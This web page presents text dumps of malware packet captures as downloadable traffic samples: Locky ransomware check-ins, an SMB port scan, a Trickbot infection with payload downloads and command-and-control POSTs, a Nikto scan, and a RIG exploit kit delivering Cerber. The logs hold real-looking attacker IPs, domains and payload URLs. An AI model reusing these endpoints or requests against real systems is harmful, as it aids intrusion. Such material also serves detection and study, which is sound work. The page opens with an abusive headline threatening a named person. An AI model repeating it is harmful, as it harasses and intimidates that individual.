Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Locky Ransomware Variant Malware PCAP File Download Traffic Sample

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
E….{@….K
.i…….P&p…n^.P…8…POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
E..(…………
.i.P…n^.&p..P…[………
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
E..4.|@…..
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
E..(…………
.i.P…n^.&p..P…X………
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E……………
.i.P…n^.&p..P…Q…HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
E..(.}@….&
.i…….P&p…na.P..D[………
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
E….~@….c
.i>……PE…}td.P….Q..POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
E..4..@….5
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E………..>…
.i.P..}td.E…P…….HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
E..(..@….@
.i>……PE…}tgnP..D……….
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
E..,……Gbh…
.i.P.$.H.M.?..`…3………
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
.ih….$.P.?…H.NP…KC……..
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
E…..@…..
.ih….$.P.?…H.NP…….POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive

SMB NMAP Portscan Port scanning PCAP File Download Traffic Sample Analysis

2017-06-20 14:09:12.664927 IP 10.101.22.128.49739 > 221.184.213.149.445: Flags [S], seq 3893475975, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….

e…….K………… ..;…………..
2017-06-20 14:09:12.758627 IP 10.101.22.128.49741 > 212.104.117.73.445: Flags [S], seq 1202043706, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…w.
e…huI.M..G..:…… ……………..
2017-06-20 14:09:12.771825 IP 10.72.158.57.59199 > 10.101.21.107.445: Flags [S], seq 436800387, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@.~…
H.9
e.k.?… …….. .x<………….. 2017-06-20 14:09:12.785013 IP 172.20.31.74.64831 > 10.101.20.47.445: Flags [S], seq 347664739, win 8192, options [mss 1380,nop,wscale 2,sackOK,TS val 51473388 ecr 0], length 0
E..<..@.q. ….J e./.?…..c…… ..L…..d……. ..k….. 2017-06-20 14:09:12.820839 IP 10.101.22.128.49743 > 118.239.76.174.445: Flags [S], seq 502529660, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e..v.L..O…..|…… ……………..
2017-06-20 14:09:12.867372 IP 10.27.117.40.51918 > 10.101.21.40.445: Flags [S], seq 252935156, win 8192, options [mss 1380,nop,wscale 2,nop,nop,sackOK], length 0
E..4.@.m... .u( e.(......{....... .Y......d........ 2017-06-20 14:09:12.867686 IP 10.101.22.128.49744 > 130.69.49.167.445: Flags [S], seq 839731710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@....i e...E1..P..2.I....... .:&.............. 2017-06-20 14:09:12.947781 IP 10.102.169.67.57901 > 10.101.21.54.445: Flags [S], seq 2258261251, win 5840, options [mss 1460,sackOK,TS val 2207468264 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0 E..L..@.7.^d f.C e.6.-....U.................... ..J.........L ..dD....L..... 2017-06-20 14:09:12.958471 IP 172.20.147.59.58165 > 10.101.20.79.445: Flags [S], seq 721417024, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 E..44.@.p.x....; e.O.5..*..@...... ................. 2017-06-20 14:09:12.992756 IP 10.101.22.128.49746 > 152.222.186.96.445: Flags [S], seq 464388263, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@...n. e......R………… ……………..
2017-06-20 14:09:13.039562 IP 10.101.22.128.49748 > 29.89.169.211.445: Flags [S], seq 855875173, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….&
e…Y…T..3..e…… ……………..
2017-06-20 14:09:13.070724 IP 10.101.22.128.49749 > 152.100.211.153.445: Flags [S], seq 1583303698, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…US
e…d…U..^_L……. .S……………
2017-06-20 14:09:13.073884 IP 10.89.37.211.53044 > 10.101.21.118.445: Flags [S], seq 801397140, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4E,@.v.o.
Y%.
e.v.4../.Y……. ……………..
2017-06-20 14:09:13.226796 IP 10.101.22.128.49752 > 187.236.46.149.445: Flags [S], seq 21748602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…….X…K.z…… ……………..
2017-06-20 14:09:13.258021 IP 10.101.22.128.49753 > 216.57.215.72.445: Flags [S], seq 4161335896, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…9.H.Y…..X…… ..0…………..
2017-06-20 14:09:13.296307 IP 10.102.169.129.51237 > 10.101.20.177.445: Flags [S], seq 973127344, win 5840, options [mss 1460,sackOK,TS val 2207468613 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length
0
E..L..@.7.y.
f..
e…%..:………..{x………
..LE……..L
..dD….L…..
2017-06-20 14:09:13.320605 IP 10.101.22.128.49755 > 202.253.124.66.445: Flags [S], seq 2143311680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…z.
e….|B.[….W@…… .K……………
2017-06-20 14:09:13.461584 IP 10.101.22.128.49757 > 56.71.64.115.445: Flags [S], seq 868905440, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
E..s..@……..f.w.
…P\WQ..M^PP…-…GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
E..(………w.
…f.P…M^P\WQ.P…l………
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK
E.

…….$..w.

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
E..(..@….H…f.#.@.3.P.Fr.X.1.P….o……..
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…..@……..f.#.@.3.P.Fr.X.1.P…5…GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
E..(.w…..~.#.@…f.P.3X.1..FsLP………….
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

E….x…….#.@…f.P.3X.1..FsLP…\W..HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
E..(..@…w….f…..4.P.UsR.L.4P…h………
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
E…..@…v….f…..4.P.UsR.L.4P…….GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0
E..(.|………….f.P.4.L.4.Ut+P…g………

2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..( =@….p…fU….8.P#.k9.Q,.P………….
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
E… >@……..fU….8.P#.k9.Q,.P…….GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0
E..()+….2.U……f.P.8.Q,.#.k.P….*……..

2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
E..(B.@…]……..f…Ds7T.f ..P………….
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
E….N@……..fU….8.P#.k..W..P…./..GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

E..(..@….H…f.|…J....M....P...Q......... 2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230 E.....@....a...f.|...J....M….P….!..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0
E..(+……..|…..f…J….`..3P…P+……..

2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..(.z@… 3…fU….x.Py….Q..P………….
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
E..r.{@……..fU….x.Py….Q..P…w…GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@……..f.|…|..c.~….;P…-a..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0

E..(………|…..f…|…;c…P…-………

E..(..@……..f.|…}…W.Z….P…h………
2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
E..`..@….v…f.|…}…W.Z….P…I…POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229

Nikto Vulnerability Scan Web Scan PCAP file Download Traffic Analysis

2017-05-09 12:37:59.683142 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 1:140, ack 1, win 342, options [nop,nop,TS val 1906265 ecr 1906265], length 139: HTTP: HEAD / HTTP/1.1
E…..@.@.c…………POT.B.$.D…V…….
…Y…YHEAD / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:Port Check)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.683158 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [.], ack 140, win 350, options [nop,nop,TS val 1906265 ecr 1906265], length 0
E..4..@.@…………P…$.DOT…..^.(…..
…Y…Y
2017-05-09 12:37:59.683362 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 1:309, ack 140, win 350, options [nop,nop,TS val 1906265 ecr 1906265], length 308: HTTP: HTTP/1.1 200 OK

E..h..@.@..o………P…$.DOT…..^..….

E..4..@.@.c…………POT…$.x…^.(…..
…Y…Y
2017-05-09 12:37:59.911325 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 140:275, ack 309, win 350, options [nop,nop,TS val 1906322 ecr 1906265], length 135: HTTP: GET / HTTP/1.1
E…..@.@.c…………POT…$.x…^…….
…….YGET / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:getinfo)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.913490 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 309:2776, ack 275, win 359, options [nop,nop,TS val 1906323 ecr 1906322], length 2467: HTTP: HTTP/1.1 200 OK
E. …@.@.y……….P…$.xOT.T…g…….
……..HTTP/1.1 200 OK
Date: Tue, 09 May 2017 16:37:59 GMT

Server: Apache/2.4.7 (Ubuntu)

E..4..@.@.c…………POT.T.$…..].(…..
……..
2017-05-09 12:37:59.923296 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 275:412, ack 2776, win 1373, options [nop,nop,TS val 1906325 ecr 1906323], length 137: HTTP: GET / HTTP/1.1
E…..@.@.c…………POT.T.$…..]…….
……..GET / HTTP/1.1
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:map_codes)
Host: www.sec542.org
Connection: Keep-Alive

2017-05-09 12:37:59.923546 IP 127.0.0.1.80 > 127.0.0.1.46236: Flags [P.], seq 2776:5243, ack 412, win 367, options [nop,nop,TS val 1906325 ecr 1906325], length 2467: HTTP: HTTP/1.1 200 OK
E. .. @.@.y……….P…$..OT…..o…….
……..HTTP/1.1 200 OK
Date: Tue, 09 May 2017 16:37:59 GMT

Server: Apache/2.4.7 (Ubuntu)

2017-05-09 12:37:59.928206 IP 127.0.0.1.46236 > 127.0.0.1.80: Flags [P.], seq 412:561, ack 5243, win 2397, options [nop,nop,TS val 1906326 ecr 1906325], length 149: HTTP: GET /ZJ2qzIGY.asa HTTP/1.1
E…..@.@.c…………POT…$…. ]…….
……..GET /ZJ2qzIGY.asa HTTP/1.1
Connection: Keep-Alive
Host: www.sec542.org
User-Agent: Mozilla/4.75 (Nikto/2.1.4) (Evasions:None) (Test:map_codes)

PSEUDO-DARKLEECH RIG EK Exploit Kit Delivers Cerber Ransomware PCAP file Download

2016-12-11 16:42:13.907878 IP 10.12.10.101.49182 > 195.133.48.182.80: Flags [P.], seq 1489:2173, ack 21396, win 63936, length 684: HTTP: GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&
ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
E…..@…..
.
e..0….P.:..”..;P…….GET /?q=znbQMvXcJwDQDofGMvrESLtEMU3QA0KK2OH_76yyEoH9JHT1vrHUSkrttgWCel-&aqs=mozilla.96b65.406f1e1&ie=Windows-1251&oq=C8aAlL7BXbgS03hDRflRjnYcLAwsa9_-ph0eDwEeb1JaDqxy9YgxB-5qlV7F8jg&sourceid=mozilla&es_sm=99 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://acc.xrossflex.com/?sourceid=yandex&q=znvQMvXcJwDQDoDGMvrESLtEMU7QA0KK2OH_76uyEoH9JHT1vrfUSkrtt&aqs=yandex.100l87.406n0h1&ie=Windows-1
x-flash-version: 11,7,700,232
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com
Connection: Keep-Alive

2016-12-11 16:42:14.617380 IP 195.133.48.182.80 > 10.12.10.101.49182: Flags [P.], seq 21396:22747, ack 2173, win 64240, length 1351: HTTP: HTTP/1.1 200 OK
E..o.’….)…0.
.
e.P..”..;.:./P….l..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:01 GMT
Content-Length: 13529
Content-Type: application/x-shockwave-flash
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive


.2016-12-11 16:42:16.868147 IP 10.12.10.101.49185 > 195.133.48.182.80: Flags [P.], seq 1:443, ack 1, win 64240, length 442: HTTP: GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
E…..@…..
.
e..0..!.P….LD..P….N..GET /?sourceid=mozilla&es_sm=120&ie=UTF-8&oq=C8fJ-JbBSOlC0jRbVKgAwno9UBAtC_qn4iUTcnx_Nh8OD_RTbUQ9E_JaQHYFmmF4&aqs=mozilla.75b112.406z2q4&q=wX3QMvXcJwDQDIbGMvrESLtFNknQA0KK2Iv2_dqyEoH9fGnihNzUSkr36B2aCm2 HTTP/1.1
Connection: Keep-Alive
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: acc.xrossflex.com

2016-12-11 16:42:16.868305 IP 195.133.48.182.80 > 10.12.10.101.49185: Flags [.], ack 443, win 64240, length 0
E..(.7……..0.
.
e.P.!LD……P…UQ……..
2016-12-11 16:42:17.538090 IP 195.133.48.182.80 > 10.12.10.101.49183: Flags [.], seq 1:1461, ack 433, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E….:….)6..0.
.
e.P…d..6 ..P…N…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sun, 11 Dec 2016 20:42:03 GMT
Accept-Ranges: bytes
Content-Length: 276726
Content-Type: application/x-msdownload
Via: 1.1 proxy5.cosa.root.ci.sat.tx.us:80 (Cisco-WSA/9.1.1-074)
Connection: keep-alive

e.E…#.P1.w..p.P…………. 2016-12-11 16:44:08.514628 IP 10.12.10.101.49187 > 185.69.153.226.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342: HTTP: GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1 E..~ .@….. . e.E…#.P1.w..p.P…;…GET /0123-4567-89AB-CDEF-0123?iframe HTTP/1.1
Accept: /
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ffoqr3ug7m726zou.uld7hk.top
Connection: Keep-Alive